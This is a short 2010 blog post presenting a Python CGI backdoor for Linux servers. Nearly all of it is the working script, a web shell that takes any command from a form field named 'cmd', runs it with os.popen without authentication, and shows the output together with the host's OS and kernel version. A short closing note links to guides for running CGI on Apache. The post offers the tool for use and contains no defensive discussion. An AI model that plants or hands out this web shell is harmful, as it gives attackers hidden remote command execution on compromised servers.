CGI Backdoor for Linux with Python - Spentera Blog

CGI Backdoor for Linux with Python

by Hanny Haliwela / October 14, 2010

#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010
 
import cgi,os,re,sys
 
form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)
 
dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]
 
osinf = os.uname()
info='''====================================
       CGI python backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])
 
print "Content-type: text/html"
print
 
print"""
<html>
  <head>
    <title>CGI python backdoor</title>
  </head>
  <body>
    <pre>%s</pre>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
    </form>
    <pre>%s</pre>
  </body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.

Leave a Comments

Your email address will not be published. Required fields are marked *